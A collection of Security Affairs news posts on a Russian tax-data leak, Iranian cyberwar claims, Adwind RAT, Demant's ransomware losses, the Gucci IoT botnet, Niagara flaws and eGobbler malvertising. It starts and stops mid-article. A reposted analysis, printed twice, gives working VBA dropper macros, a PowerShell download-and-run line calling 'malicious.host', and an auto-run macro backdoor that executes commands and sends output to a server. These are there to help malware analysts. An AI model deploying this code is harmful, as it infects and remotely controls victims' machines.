“The first database contained more than 14 million personal and tax records from 2010 to 2016, and the second included over 6 million from 2009 to 2015.” continues the experts.

Exposed records included the following information:

  • Full name
  • Address
  • Residency status
  • Passport number
  • Phone number
  • Tax ID number
  • Employer name and phone number
  • Tax amount

The exposed data could be used by threat actors to carry out tax scam and frauds.

“Affected individuals could be at risk of identity theft and should monitor their accounts closely. Tax fraud could also be a risk, though our team is not well-versed enough on the topic of the Russian tax system to give concrete advice.” concludes the experts.

“Potential victims should also be on the lookout for targeted phishing and other scams. Fraudsters could pose as tax officials, for example, to steal money or request additional information to aid in identity theft.”

Pierluigi Paganini

(SecurityAffairs – Russian citizens, data leak)

The post Experts found 20 Million tax records for Russian citizens exposed online appeared first on Security Affairs.

Teheran: U.S. has started ‘Cyber War’ against Iran

Iran ’s Passive Defense Organization chief Gholamreza Jalali declared that the US government has started its cyber war against the country.

Gholamreza Jalali, Iran’s Passive Defense Organization chief, announced that that “America has started its cyber war against Iran, without providing more details.

The news was reported by the ISNA news website on October 1, Jalali also added that Iran “decisively will resort to cyber defense.”

Jalali is an Islamic Revolution Guard Corps (IRGC) brigadier general, in November 2018 he announced that government experts have uncovered and neutralized a new strain of Stuxnet.

“Recently we discovered a new generation of Stuxnet which consisted of several parts … and was trying to enter our systems,” Jalali was quoted as saying by the semi-official ISNA news agency at a news conference marking Iran’s civil defense day

In May, Jalali had accused the U.S. of carrying out psyops operations through social media aimed at influencing Iranians’ sentiment on specific topics. The official also revealed that Iran is targeted by 50,000 cyberattacks, the cyber defense of the country suffers eight major attacks annually.

Last week, Iran’s oil minister, Bijan Namdar Zanganeh, ordered companies operating in the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

“it is necessary for all companies and installations the oil industry to be on full alert against physical and cyber threats,” reads a statement published on the oil ministry’s Shana website.

Iran fears a retaliation of Western countries that are accusing it to carry out physical and cyber attacks against their infrastructure and countries in the Middle East.

Military and intelligence experts believe that western coalition, driven by the US could carry out a series of cyber attacks against Iranian critical infrastructure. A few days after the drone attacks, some western media reported destructive cyber attacks against infrastructures in the Iranian oil sector, but Iran denied it.

Pierluigi Paganini

(SecurityAffairs – Iran, cyberwar)

The post Teheran: U.S. has started ‘Cyber War’ against Iran appeared first on Security Affairs.

A new Adwind variant involved in attacks on US petroleum industry

Adwind is back, a new variant of the popular RAT is targeting US petroleum industry entities with new advanced features.

A new variant of the popular Adwind RAT (aka jRATAlienSpy, and JSocket) is targeting entities in the US petroleum industry. The new variant implements advanced features such as multi-layer obfuscation. The malware is distributed via a malspam campaign, the spam messages come with malicious attachments or include URL to malicious content.

“A new campaign spreading the Adwind RAT has been seen in the wild, specifically targeting the petroleum industry in the US. The samples are relatively new and implement multi-layer obfuscation to try to evade detection.” reads the analysis published by NetSkope. “We found multiple RAT samples hosted on the serving domain and spread across multiple directories, all hosted within the last month.”

Adwind is a cross-platform Remote Access Trojan written in Java, it was observed in attacks against aerospace enterprises in Switzerland, Austria, Ukraine, and the US. The Adwind RAT was first discovered early 2012, the experts dubbed it Frutas RAT and later it was identified with other names, Unrecom RAT (February 2014), AlienSpy (October 2014), and recently JSocket RAT (June 2015).

Adwind is could infect all the major operating systems, including Windows, Mac, Linux, and Android, it is available in the cybercrime underground as a malware-as-a-service (MaaS) model.

Once the Adwind RAT has infected a computer it can recruit it into a botnet for several illegal purposes (i.e. DDoS attacks, brute-forcing attacks).

Experts pointed out that the functionality of the RAT has remained the same as previous variants, the major change is in the obfuscation technique it implements. The malware uses delivers RAT payloads via nested JAR archives. The Netskope Threat Protection detects the malware as ByteCode-JAVA.Trojan.Kryptik and Gen:Variant.Application.Agentus.1.

“When the victim executes the payload, there are multiple levels of JAR extractions that occur.” continues the analysis

Netskope researchers discovered 20 malware samples hosted using compromised user accounts of the Australian ISP Westnet.

“The Adwind RAT is a well-known malware family that has actively been used in multiple campaigns over the last couple of years. The samples we analyzed showed that the VirusTotal detection ratio for the top-level JAR was 5/56 while that of the final decrypted JAR was 49/58.” conclude the expert. “These detection ratios indicate that attackers have largely been successful in developing new, innovative obfuscation techniques to evade detection.”

Netyskope’s report includes Indicators of compromise (IOCs), malware sample hashes for various JAR payloads used in these attacks, and IP addresses and domains of C&C infrastructure.

Pierluigi Paganini

(SecurityAffairs – Adwind, malware)

The post A new Adwind variant involved in attacks on US petroleum industry appeared first on Security Affairs.

Danish company Demant expects to incur losses of up to $95 after cyber attack

Demant, a leading international hearing health care company, expects to incur losses of up to $95 million following a ransomware attack.

Last month, Demant suffered a cyber attack that caused important problems to its operations, the company has yet to recover after the attack, a circumstance that suggests it was hit by a ransomware attack.

Demant expects to incur losses of up to $95 million following the incident, which includes a deduction of $14.6 million of expected insurance coverage.

We are therefore talking about figures that come into the list of the most important losses caused by cyber attacks.

“The cyber-crime has had a significant impact on our ability to generate the growth we expected for the second half-year, and even though our commercial operations are doing their utmost to make up for the impact of the incident, we are in a situation where we cannot execute on our ambitious commercial growth activities to the planned extent. We are working around the clock to return to our growth-oriented business focus, while minimising the impact on customers and users of our products. We are grateful for the patience and loyalty shown, and the Demant organisation will continue to approach the incident with extreme dedication until we are completely recovered and have re-established what was severely disrupted by the incident,” says Søren Nielsen, President & CEO of Demant.

On September 3, Demant was forced to shut down its entire internal IT infrastructure following an act of “cyber-crime,” but the firm did not confirm a ransom incident.

“As previously communicated in Company announcements on 3, 4 and 17 September, the Demant Group experienced a critical incident on our internal IT infrastructure on 3 September 2019. The Group’s IT infrastructure was hit by cyber-crime.” reads a message sent by the company to the investors.

“Our quick response to the issue by shutting down IT systems across multiple sites and business units contained and limited the issue, but key business processes throughout the value chain were nevertheless impacted by the incident, including R&D, production and distribution.”

The company published a statement that confirmed that a large portion of its infrastructure was impacted.

“It remains unclear whether it was a hacker attack that caused a critical crash in the IT infrastructure of the Danish company Demant on Tuesday evening.” reported ComputerWord.

“But there are many indications that it could be a ransomware attack that has hit the company, according to security expert Jens Monrad, who is a daily employee of IT security firm FireEye.”

The company reported “delays in the supply of products as well as an impact on our ability to receive orders.” The incident impacted production lines in Poland as well as production in Mexico.

Many clinics across Demant network have not been able to regularly provide to their service to end-users.

The impact is predominately related to the estimated lost sales and on the growth momentum.

“Approximately half of the estimated lost sales relates to our hearing aid wholesale business. The incident has prevented us from executing our ambitious growth activities in some of the most important months of the year – particularly in the US, which is our biggest market,” concludes Demant.

“A little less than half of the estimated lost sales relates to our retail business where a significant number of clinics have been unable to service end-users in a regular fashion. We estimate that our retail business will see the biggest impact in Australia, the US and Canada followed by the UK. The vast majority of our clinics are now fully operational, however, due to the effect of the incident on our ability to generate new appointments during September, we expect some lost sales in the next one or two months, which is also included in the current estimate.”

The incident is important because demonstrates the potential impact of a cyber attack on organizations and urges them to adopt necessary countermeasures.

The massive NotPetya ransomware attack caused billions of dollars to organizations worldwide, the shipping giant Maersk and courier service FedEx incurred in over $300 million each. In April, the Aluminum producer Norsk Hydro estimated the cost of the massive attack cyber attack targeting the company in March at around $50 million.

Pierluigi Paganini

(SecurityAffairs – Demant, ransomware)

The post Danish company Demant expects to incur losses of up to $95 after cyber attack appeared first on Security Affairs.

Frequent VBA Macros used in Office Malware

The malware expert Marco Ramilli collected a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in cyber attacks.

Nowadays one of the most frequent cybersecurity threat comes from Malicious (office) document shipped over eMail or Instant Messaging. Some analyzed threats examples include: Step By Step Office Dropper DissectionSpreading CVS Malware over GoogleMicrosoft Powerpoint as Malware DropperMalHIDEInfo Stealing: a New Operation in the WildAdvanced All in Memory CryptoWorm, etc. Many analyses over the past few years taught that attackers love re-used code and they prefer to modify, obfuscate and finally encrypt already known code rather than writing from scratch new “attacking modules”. Here comes the idea to collect a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Microsoft Doc are used as droppers. The core concept of a dropper is to Download and to Execute a third party payload (or a second stage) and often when you analyse Office dropper you would experience many layers of obfuscation. Obfuscation comes to make the analysis harder and harder, but once you overcome that stage you would probably see a VBA code looking like the following one.

Download And Execute an External Program

Private Sub DownloadAndExecute()
    Dim droppingURL As String
    Dim localPath As String
    Dim WinHttpReq As Object, oStream As Object
    Dim result As Integer
    
    droppingURL = "https://example.com/mal.exe"
    localPath = "c://asd.exe"
    
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", droppingURL, False ', "username", "password"
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile localPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
        oStream.Close
        CreateObject("WScript.Shell").Run localPath, 0
    End If    
    
End Sub

The main idea behind this function (or sub-routine) is to invoke ServerXMLHTTP object to download a file from an external resource, to save it on local directory (ADODB.Stream object) and finally to execute it through the object WScript.Shell. You might find variants of this behavior, for example you might find controls over language to target specific countries or specific control on already infected machine, for example by avoiding network traffic if the file is already in the localPath. A possible very common way to add infection control on the same victim is, for example, by adding the following code before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and to execute a DLL instead of external file. In such a case we can invoke the exported DLL function directly from the VBA code as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll()
    Dim dll_Loc As String
    dll_Loc = Environ("AppData") & "\Microsoft\Office"
    If Dir(dll_Loc, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    VBA.ChDir dll_Loc
    VBA.ChDrive "C"
    
    'Download DLL
    Dim dll_URL As String
    dll_URL = "https://example.com/mal.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "Saved.asd", 2
        oStream.Close

        ModuleExportedInDLL.Invoke 
    End If
End Sub

Running DLL and External PE is not the only solution to run code on the victim machine, indeed we might use Powershell as well ! A nice way to execute PowerShell without direct access to PowerShell.exe is by using its DLLs, thanks to PowerShdll project this is possible, for example, in the following way

Dropping and Executing PowerShell

Sub RunDLL()
    DownloadDLL
    Dim Str As String
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { Invoke-WebRequest -useb "YouWish" } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Function


Sub DownloadDLL()
    Dim dll_Local As String
    dll_Local = Environ("TEMP") & "\powershdll.dll"
    If Not Dir(dll_Local, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    Dim dll_URL As String
    #If Win64 Then
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
    #Else
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
    #End If
    
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile dll_Local
        oStream.Close
    End If
End Sub

Or if you have direct access to PowerShell.exe you might use a simple inline script as the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell  (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By applying those techniques (http and execute commands) you might decide to run commands on the victim machine such having a backdoor. Actually I did see this code few times related to manual attacks back in 2017. The code below comes from the great work made by sevagas.


Dim serverUrl As String ' Auto generate at startup Sub Workbook_Open() Main End Sub Sub AutoOpen() Main End Sub Private Sub Main() Dim msg As String serverUrl = "<<<TEMPLATE>>>" msg = "<<<TEMPLATE>>>" On Error GoTo byebye msg = PlayCmd(msg) SendResponse msg On Error GoTo 0 byebye: End Sub 'Sen data using http post' 'Note: 'WinHttpRequestOption_SslErrorIgnoreFlags, // 4 ' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx' Private Function HttpPostData(URL As String, data As String) 'data must have form "var1=value1&var2=value2&var3=value3"' Dim objHTTP As Object Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") objHTTP.Option(4) = 13056 ' Ignore cert errors because self signed cert objHTTP.Open "POST", URL, False objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded" objHTTP.SetTimeouts 2000, 2000, 2000, 2000 objHTTP.send (data) HttpPostData = objHTTP.responseText End Function ' Returns target ID' Private Function GetId() As String Dim myInfo As String Dim myID As String myID = Environ("COMPUTERNAME") & " " & Environ("OS") GetId = myID End Function 'To send response for command' Private Function SendResponse(cmdOutput) Dim data As String Dim response As String data = "id=" & GetId & "&cmdOutput=" & cmdOutput SendResponse = HttpPostData(serverUrl, data) End Function ' Play and return output any command line Private Function PlayCmd(sCmd As String) As String 'Run a shell command, returning the output as a string' ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility... ' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a windows Dim instruction As String instruction = "cmd.exe /c " & sCmd & " | clip" CreateObject("WScript.Shell").Run instruction, 0, True ' Read the clipboard text using htmlfile object PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text") End Function

You probably will never see those codes like described here, but likely you will find many similarities with the Macros you are/will analyse in your next MalDoc analyses. Just remember that on one hand the attackers love to re-use code but on the other hand they really like to customize it. In your next VBA Macro analysis keep in mind those stereotypes and speed up your analysis.

Nowadays one of the most frequent cybersecurity threat comes from Malicious (office) document shipped over eMail or Instant Messaging. Some analyzed threats examples include: Step By Step Office Dropper DissectionSpreading CVS Malware over GoogleMicrosoft Powerpoint as Malware DropperMalHIDEInfo Stealing: a New Operation in the WildAdvanced All in Memory CryptoWorm, etc. Many analyses over the past few years taught that attackers love re-used code and they prefer to modify, obfuscate and finally encrypt already known code rather than writing from scratch new “attacking modules”. Here comes the idea to collect a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Microsoft Doc are used as droppers. The core concept of a dropper is to Download and to Execute a third party payload (or a second stage) and often when you analyse Office dropper you would experience many layers of obfuscation. Obfuscation comes to make the analysis harder and harder, but once you overcome that stage you would probably see a VBA code looking like the following one.

Download And Execute an External Program

Private Sub DownloadAndExecute()
    Dim droppingURL As String
    Dim localPath As String
    Dim WinHttpReq As Object, oStream As Object
    Dim result As Integer
    
    droppingURL = "https://example.com/mal.exe"
    localPath = "c://asd.exe"
    
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", droppingURL, False ', "username", "password"
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile localPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
        oStream.Close
        CreateObject("WScript.Shell").Run localPath, 0
    End If    
    
End Sub

The main idea behind this function (or sub-routine) is to invoke ServerXMLHTTP object to download a file from an external resource, to save it on local directory (ADODB.Stream object) and finally to execute it through the object WScript.Shell. You might find variants of this behavior, for example you might find controls over language to target specific countries or specific control on already infected machine, for example by avoiding network traffic if the file is already in the localPath. A possible very common way to add infection control on the same victim is, for example, by adding the following code before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and to execute a DLL instead of external file. In such a case we can invoke the exported DLL function directly from the VBA code as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll()
    Dim dll_Loc As String
    dll_Loc = Environ("AppData") & "\Microsoft\Office"
    If Dir(dll_Loc, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    VBA.ChDir dll_Loc
    VBA.ChDrive "C"
    
    'Download DLL
    Dim dll_URL As String
    dll_URL = "https://example.com/mal.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "Saved.asd", 2
        oStream.Close

        ModuleExportedInDLL.Invoke 
    End If
End Sub

Running DLL and External PE is not the only solution to run code on the victim machine, indeed we might use Powershell as well ! A nice way to execute PowerShell without direct access to PowerShell.exe is by using its DLLs, thanks to PowerShdll project this is possible, for example, in the following way

Dropping and Executing PowerShell

Sub RunDLL()
    DownloadDLL
    Dim Str As String
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { Invoke-WebRequest -useb "YouWish" } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Function


Sub DownloadDLL()
    Dim dll_Local As String
    dll_Local = Environ("TEMP") & "\powershdll.dll"
    If Not Dir(dll_Local, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    Dim dll_URL As String
    #If Win64 Then
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
    #Else
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
    #End If
    
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile dll_Local
        oStream.Close
    End If
End Sub

Or if you have direct access to PowerShell.exe you might use a simple inline script as the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell  (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By applying those techniques (http and execute commands) you might decide to run commands on the victim machine such having a backdoor. Actually I did see this code few times related to manual attacks back in 2017. The code below comes from the great work made by sevagas.


Dim serverUrl As String ' Auto generate at startup Sub Workbook_Open() Main End Sub Sub AutoOpen() Main End Sub Private Sub Main() Dim msg As String serverUrl = "<<<TEMPLATE>>>" msg = "<<<TEMPLATE>>>" On Error GoTo byebye msg = PlayCmd(msg) SendResponse msg On Error GoTo 0 byebye: End Sub 'Sen data using http post' 'Note: 'WinHttpRequestOption_SslErrorIgnoreFlags, // 4 ' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx' Private Function HttpPostData(URL As String, data As String) 'data must have form "var1=value1&var2=value2&var3=value3"' Dim objHTTP As Object Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") objHTTP.Option(4) = 13056 ' Ignore cert errors because self signed cert objHTTP.Open "POST", URL, False objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded" objHTTP.SetTimeouts 2000, 2000, 2000, 2000 objHTTP.send (data) HttpPostData = objHTTP.responseText End Function ' Returns target ID' Private Function GetId() As String Dim myInfo As String Dim myID As String myID = Environ("COMPUTERNAME") & " " & Environ("OS") GetId = myID End Function 'To send response for command' Private Function SendResponse(cmdOutput) Dim data As String Dim response As String data = "id=" & GetId & "&cmdOutput=" & cmdOutput SendResponse = HttpPostData(serverUrl, data) End Function ' Play and return output any command line Private Function PlayCmd(sCmd As String) As String 'Run a shell command, returning the output as a string' ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility... ' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a windows Dim instruction As String instruction = "cmd.exe /c " & sCmd & " | clip" CreateObject("WScript.Shell").Run instruction, 0, True ' Read the clipboard text using htmlfile object PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text") End Function

You probably will never see those codes like described here, but likely you will find many similarities with the Macros you are/will analyse in your next MalDoc analyses. Just remember that on one hand the attackers love to re-use code but on the other hand they really like to customize it. In your next VBA Macro analysis keep in mind those stereotypes and speed up your analysis.

The original post is available on Marco Ramilli’s blog:

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Pierluigi Paganini

(SecurityAffairs – VBA macros, Office malware)

The post Frequent VBA Macros used in Office Malware appeared first on Security Affairs.

Gucci IOT Bot Discovered Targeting European Region

Security Labs discovered a new IOT bot named “GUCCI”. It seems like the IOT botnet is named after an Italian luxury brand of fashion and leather goods.

Analysis

The discovery came to exist during our reconnaissance and intelligence collection process.  The IOT threat detection engine picked the infection IP has shown below hosting number of bins for different architectures

Gucci

Figure 1: GUCCI Bot Binaries

All the bins were successfully downloaded and magic headers were analyzed to check the type of file. Figure 2 highlights how the GUCCI bot binaries are compiled.

Figure 2:  Bot: compiled Binaries

As you can see the output in Figure 2, all the Gucci bot binaries are “stripped”.  This means that when these binaries were compiled all the debug symbols were removed from these executables to reduce the size. Listing 1 highlights the Md5 hashes of the binaries being analyzed.

MD5 (arm) = b24e88da025e2e2519a96dd874e6ba8bMD5 (arm5) = 24ef4178e365c902cfdd53d0ea0d1dc2MD5 (arm6) = 5a5a27635570b2c3634cab62beadc951MD5 (arm7) = c1ef67719e9762fc46aeb28a064fe0aeMD5 (m68k) = 2b984677ab9ee264a2dae90ca994a2a6MD5 (mips) = a0e0da3ae1ad1b94f0626c3e0cb311adMD5 (mpsl) = ee26f791f724f92c02d976b0c774290dMD5 (ppc) = e16f594cbdd7b82d74f9abc65e0fe677MD5 (sh4) = a70d246e911fe52638595ea97ed07342MD5 (spc) = d1b719ab9b7be08ea418b47492108dfaMD5 (x86) = de94d4718127959a494fe8fbc4aa5b2a
Listing 1: MD5 Hashes of the Gucci Bit Binaries

The binaries were found to be obfuscated in nature. On further analysis, it was analyzed that the Gucci bot was connecting to the  remote IP on the  TCP port “5555” and transmitting the data accordingly.  Digging deeper, we found that the remote host running a custom telnet service on TCP port 5555 and exchanging commands with Gucci bots regularly. When a test connection was initiated on TCP port 5555  using telnet client on remote IP,  the successful connection acceptance resulted in requirement of credentials.

Compromising C&C

Without authentication credential, it was not possible to access the service.  Considering all scenarios, automated brute force and account cracking attempts were performed. The account credentials were successfully cracked and connection was initiated and accepted as credentials are accepted.

Figure 3 highlights that Gucci bot Command and Control panel was hijacked and privilege access was obtained.                                                                                                                     

Figure 3: Gucci C&C Bot Panel

The C&C listed out the different type of Denial of Service (DoS) attack types supported by the Gucci bot. The support scans are:

  • HTTP null scan
  • UDP flood
  • Syn flood
  • ACK flood
  • UDP flood with less protocol options
  • GRE IP flood
  • Value Source Engine specific flood

It was noticed that Gucci bot was in early stages of deployment.  It was also analyzed that  the botnet operator was monitoring all the access connections to the Gucci C&C.  As soon as the botnet operator realized that the C&C has been compromised, the TCP service was removed from the host and operator cleaned the directories and performed an additional set of operations to hide indicators and artefacts.  The binaries were distributed from the location as provided in Figure 4

Figure 4: Gucci Bot – Source of Distribution

Inference

A new IOT bot Gucci has been discovered and analyzed accordingly.  The botnet operator was found to be very proactive. The whole analysis and obtaining C&C  access was like an arms race.  The purpose of this research is to share the discovery details with the security research community so that extracted intelligence can be used to fingerprint, detect and prevent Gucci bot infections. It is anticipated the Gucci botnet is still in active phase and targeting European region. However, the attacks triggered by Gucci bot could be broad based or targeted depending on the requirements.

About the authors:

Aditya K Sood is a Cyber Security Expert and working in the field for more than 11 years now. His work can be found at: https://adityaksood.com;

Rohit Bansal is a Principal Security Researcher at SecNiche Security Labs

Pierluigi Paganini

(SecurityAffairs – malware, botnet)

The post Gucci IOT Bot Discovered Targeting European Region appeared first on Security Affairs.

Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS

Tridium’s Niagara product is affected by two vulnerabilities in BlackBerry’s QNX operating system for embedded devices.

The U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) is warning of two vulnerabilities in Tridium’s Niagara product that reside in the BlackBerry’s QNX operating system for embedded devices.

The flaws could be exploited by a local user to escalate their privileges.

The Niagara Framework is a universal software infrastructure developed by Tridium that allows building controls integrators, HVAC and mechanical contractors to build custom, web-enabled applications for accessing, automating and controlling smart devices real-time via local network or over the Internet.

Tridium Niagara product

The Niagara framework is widely adopted, especially in the commercial facilities, government facilities, critical manufacturing and IT sectors.

The security flaws impact Niagara AX 3.8u4, 4.4u3 and 4.7u1.

The most severe vulnerability, tracked as CVE-2019-8998, is an information disclosure flaw related to the procfs service that can be exploited by a local attacker for privilege escalation.

The flaw was discovered by Johannes Eger and Fabian Ullrich of the Secure Mobile Networking Lab at TU Darmstadt in Germany and received a CVSS score of 7.8.

“This advisory addresses an information disclosure vulnerability leading to a potential local escalation of privilege in the default configuration of the procfs service (the /proc filesystem) on affected versions of the BlackBerry QNX Software Development Platform (QNX SDP) that could potentially allow a successful attacker to gain unauthorized access to a chosen process address space.” reads the advisory.

BlackBerry QNX confirmed that it is not aware of attacks exploiting the flaw in the wild.

The second vulnerability, tracked as CVE-2019-13528, is an improper authorization issue, it could allow a specific utility to gain read access to privileged files.

“A specific utility may allow an attacker to gain read access to privileged files in the Niagara AX 3.8u4 (JACE 3e, JACE 6e, JACE 7, JACE-8000), Niagara 4.4u3 (JACE 3e, JACE 6e, JACE 7, JACE-8000), and Niagara 4.7u1 (JACE-8000, Edge 10).” reads the advisory.

This flaw was reported by Francisco Tacliad and it received a CVSS score of 4.4.

Tridium has released updates that address these vulnerabilities and recommends users update to the versions identified below:

  • Niagara AX 3.8u4: 
    • OS Dist: 2.7.402.2
    • NRE Config Dist: 3.8.401.1
  • Niagara 4.4u3:
    • OS Dist: 4.4.73.38.1 NRE Config
    • Dist: 4.4.94.14.1
  • Niagara 4.7u1:
    • OS Dist: (JACE 8000) 4.7.109.16.1
    • OS Dist (Edge 10): 4.7.109.18.1
    • NRE Config Dist: 4.7.110.32.1

Pierluigi Paganini

(SecurityAffairs – Tridium, IoT)

The post Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS appeared first on Security Affairs.

eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions

A recently observed a malvertising campaign carried out by a threat group dubbed eGobbler that hijacked roughly 1.16 billion ad impressions.

Researchers at Confiant observed a malvertising campaign carried out by a threat actor dubbed eGobbler hijacked roughly 1.16 billion ad impressions to redirect victims to websites hosting malicious payloads.

The campaign was observed between August 1 and September 23.

The eGobbler group was first observed by security firm Confiant in April when it was exploiting a security flaw in the Google Chrome browser to target millions of iOS users. At the time, Cofiant experts estimated that more than 500 million malicious ads had been served to iOS users.

This time eGobbler hackers extended their attacks to Windows, Linux, and macOS desktop devices.

“Over the past 6 months, the threat group has leveraged obscure browser bugs in order to engineer bypasses for built-in browser mitigations against pop-ups and forced redirections.” reads the analysis published by Confiant.

“This blog post will provide overviews and proof of concepts for both browser exploits. The first exploit that we reported on April 11, 2019 impacts Chrome versions prior to 75 on iOS. The second, which we reported on Aug. 7 was fixed in iOS 13 / Safari 13.0.1 on Sept. 19, impacts WebKit based browsers.”

In recent campaign, attackers used an exploit that targets WebKit based browsers, the researchers observed redirections on WebKit browsers upon the ‘onkeydown’ event.”

